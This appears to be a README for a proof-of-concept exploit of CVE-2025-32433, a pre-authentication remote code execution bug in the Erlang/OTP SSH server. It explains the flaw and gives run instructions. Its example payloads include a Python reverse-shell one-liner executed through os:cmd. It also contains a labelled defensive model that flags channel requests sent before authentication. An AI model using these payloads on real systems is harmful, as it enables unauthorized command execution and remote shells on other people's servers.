
CVE-2025-32433 PoC — Erlang/OTP SSH Vulnerable to Pre-Authentication RCE

Associated Vulnerability
Title: Erlang/OTP SSH Vulnerable to Pre-Authentication RCE (CVE-2025-32433)
Description: Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, an SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround is to disable the SSH server or to prevent access to it via firewall rules.
Readme
<h1>CVE-2025-32433 – Erlang/OTP SSH RCE Vulnerability</h1>

<h2>📌 Summary</h2>
<p>
  <strong>CVE-2025-32433</strong> is a <strong>remote code execution (RCE)</strong> vulnerability affecting the Erlang/OTP SSH daemon.
  The root cause is that the daemon processes SSH channel requests <em>before authentication has completed</em>, so an attacker can craft such
  requests to cause arbitrary command execution <strong>without valid credentials</strong>.
  The included PoC demonstrates sending such crafted SSH packets; by default it writes <code>/lab.txt</code> on the target but can be adapted for other commands.
</p>

<div style="background:#fef2f2; border-left:4px solid #ef4444; padding:10px; border-radius:6px; margin:16px 0;">
  ⚠️ <strong>Disclaimer:</strong> This repository is for <strong>educational and research purposes only</strong>. 
  Do not use against systems without explicit permission.
</div>

<h2>πŸ› οΈ Usage</h2>
<ol>
  <li>Edit target details in the PoC script:</li>
</ol>

<pre><code>HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
</code></pre>

<ol start="2">
  <li>Run the exploit:</li>
</ol>

<pre><code>python3 cve-2025-32433.py
</code></pre>

<p>
  By default it creates <code>/lab.txt</code> containing <code>pwned</code>. 
  Modify the payload in <code>build_channel_request</code> to run your own commands.
</p>

<h2>🧩 Example Payloads</h2>
<pre><code># Write a file
file:write_file("/lab.txt", <<"pwned">>).

# Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os;
s=socket.socket(); s.connect((\"127.0.0.1\",2222));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2); import pty; pty.spawn(\"sh\")'")
</code></pre>

<h2>🔧 How the PoC Works (short)</h2>
<ul>
  <li>Connects to the SSH service and exchanges banners.</li>
  <li>Sends a crafted <code>SSH_MSG_KEXINIT</code> to look like a normal handshake.</li>
  <li>Sends <code>SSH_MSG_CHANNEL_OPEN</code> and <code>SSH_MSG_CHANNEL_REQUEST</code> with an <code>exec</code> payload <em>before authentication</em>.</li>
  <li>If vulnerable, the server executes the supplied Erlang command.</li>
</ul>
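<p>
  The server-side gate that closes this bug class, written out as an added Python model (example code, not part of the PoC repository or of Erlang/OTP itself):
  connection-protocol messages such as <code>SSH_MSG_CHANNEL_OPEN</code> and <code>SSH_MSG_CHANNEL_REQUEST</code> are refused until the server has sent
  <code>SSH_MSG_USERAUTH_SUCCESS</code>. The message numbers are the standard ones from RFC 4251/4253/4254; the two session transcripts are constructed.
</p>

```python
# Added example (not from the PoC repository): a minimal model of the
# server-side state check that a hardened SSH implementation must enforce.
# Message numbers are the standard RFC 4253/4254 values.
SSH_MSG_SERVICE_REQUEST = 5
SSH_MSG_SERVICE_ACCEPT = 6
SSH_MSG_KEXINIT = 20
SSH_MSG_NEWKEYS = 21
SSH_MSG_USERAUTH_REQUEST = 50
SSH_MSG_USERAUTH_SUCCESS = 52
SSH_MSG_CHANNEL_OPEN = 90
SSH_MSG_CHANNEL_REQUEST = 98


def is_connection_protocol(msg):
    # RFC 4251 section 7: 1-49 transport, 50-79 user authentication,
    # 80-127 connection protocol (channels, exec/shell requests, ...).
    return 80 <= msg <= 127


def audit_transcript(transcript):
    """transcript: list of (direction, message_number) as the server sees it,
    'C' for client->server and 'S' for server->client.
    Returns (index, message_number) for every client connection-protocol
    message that arrived before the server sent SSH_MSG_USERAUTH_SUCCESS.
    A hardened server rejects each such message instead of dispatching it
    to its channel/exec handler, which is exactly the gap this CVE describes."""
    authenticated = False
    violations = []
    for i, (direction, msg) in enumerate(transcript):
        if direction == "S" and msg == SSH_MSG_USERAUTH_SUCCESS:
            authenticated = True
        elif direction == "C" and is_connection_protocol(msg) and not authenticated:
            violations.append((i, msg))
    return violations


# Constructed transcript shaped like the flow described above: KEXINIT
# exchange, then channel open + channel request with no authentication at all.
PREAUTH_EXEC = [
    ("C", SSH_MSG_KEXINIT), ("S", SSH_MSG_KEXINIT),
    ("C", SSH_MSG_CHANNEL_OPEN), ("C", SSH_MSG_CHANNEL_REQUEST),
]

# Constructed transcript of an ordinary session: authentication completes first.
NORMAL_SESSION = [
    ("C", SSH_MSG_KEXINIT), ("S", SSH_MSG_KEXINIT),
    ("C", SSH_MSG_NEWKEYS), ("S", SSH_MSG_NEWKEYS),
    ("C", SSH_MSG_SERVICE_REQUEST), ("S", SSH_MSG_SERVICE_ACCEPT),
    ("C", SSH_MSG_USERAUTH_REQUEST), ("S", SSH_MSG_USERAUTH_SUCCESS),
    ("C", SSH_MSG_CHANNEL_OPEN), ("C", SSH_MSG_CHANNEL_REQUEST),
]

if __name__ == "__main__":
    print("pre-auth exec attempt ->", audit_transcript(PREAUTH_EXEC))
    print("normal session        ->", audit_transcript(NORMAL_SESSION))
```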

<h2>πŸ™ Credits</h2>
<p>
  Discovery and write-up by <strong>Matt Keeley</strong> (Platform Security).  
  Thanks to him for publishing the PoC and sharing details.  
</p>
<p>
  Blog link: <a href="https://platformsecurity.com/blog/CVE-2025-32433-poc" target="_blank">https://platformsecurity.com/blog/CVE-2025-32433-poc</a>
</p>

<h2>📚 References</h2>
<ul>
  <li><a href="https://platformsecurity.com/blog/CVE-2025-32433-poc" target="_blank">Matt Keeley's blog</a></li>
  <li><a href="https://www.erlang.org/news" target="_blank">Erlang/OTP Security Advisories</a></li>
  <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32433" target="_blank">MITRE CVE Record</a></li>
</ul>
File Snapshot

[4.0K] /data/pocs/de03ba7e4d9ce80b5d83a7e2ce2d4102b609a62a
├── [4.1K] exploit.py
└── [2.8K] README.md

0 directories, 2 files